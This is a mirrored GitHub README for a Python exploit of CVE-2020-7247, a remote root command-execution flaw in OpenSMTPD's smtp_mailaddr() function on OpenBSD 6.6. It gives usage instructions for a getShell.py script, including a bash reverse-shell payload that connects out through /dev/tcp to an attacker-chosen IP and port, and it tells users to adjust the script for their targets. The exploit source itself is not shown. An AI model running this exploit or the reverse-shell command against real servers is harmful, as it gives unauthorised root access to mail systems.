Giters

kejaly / CVE-2020-7247

This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2020-7247

This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user

How to use?

python3 getShell.py <targetIp> <targetPort> <command>

If you need a reverse shell then run it like this

python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'

Important

Change some stuffs in this exploit like RCPT to and something(if needed)

See this article for more clear explaination

https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/

About

This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user

Languages

Language:Python 100.0%